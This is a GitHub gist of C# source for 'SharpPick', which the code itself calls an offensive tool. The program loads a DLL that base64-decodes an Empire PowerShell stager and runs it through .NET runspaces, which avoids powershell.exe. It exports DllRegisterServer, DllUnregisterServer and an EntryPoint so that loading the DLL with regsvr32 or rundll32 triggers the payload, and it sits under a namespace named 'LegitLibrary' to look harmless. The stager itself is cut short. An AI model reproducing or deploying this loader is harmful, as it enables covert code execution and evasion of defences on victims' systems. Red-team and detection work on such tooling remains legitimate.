Skip to content

Instantly share code, notes, and snippets.

@leesoh
Forked from bneg/EmpireDLL.cs
Created October 5, 2018 23:04
Show Gist options
  • Save leesoh/c7440b26739b5c00e65d26389dde5de3 to your computer and use it in GitHub Desktop.
Save leesoh/c7440b26739b5c00e65d26389dde5de3 to your computer and use it in GitHub Desktop.
/*
* SharpPick aka InexorablePoSH
* Description: Application to load and run powershell code via the .NET assemblies
* License: 3-Clause BSD License. See Veil PowerTools Project
*
* This application is part of Veil PowerTools, a collection of offensive PowerShell
* capabilities. Hope they help!
*
* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
*/
using System;
using System.IO;
using System.Resources;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Net;
//Adding libraries for powershell stuff
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
namespace LegitLibrary
{
public class Program
{
public static string RunPS(string cmd)
{
//Init stuff
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
//Add commands
pipeline.Commands.AddScript(cmd);
//Prep PS for string output and invoke
pipeline.Commands.Add("Out-String");
Collection<PSObject> results = pipeline.Invoke();
runspace.Close();
//Convert records to strings
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
return stringBuilder.ToString().Trim();
}
}
public class Service
{
public static void Exec()
//static int Main(string[] args)
{
string stager = "WwBSAEUARgBdAC4AQQBTAFM...[SNIP]";
var decodedScript = Encoding.Unicode.GetString(Convert.FromBase64String(stager));
//We should now have the script variable filled... double check before executing
string results = Program.RunPS(decodedScript);
}
}
class Exports
{
[DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
{
Service.Exec();
}
[DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
public static void DllRegisterServer()
{
Service.Exec();
}
[DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
public static void DllUnregisterServer()
{
Service.Exec();
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment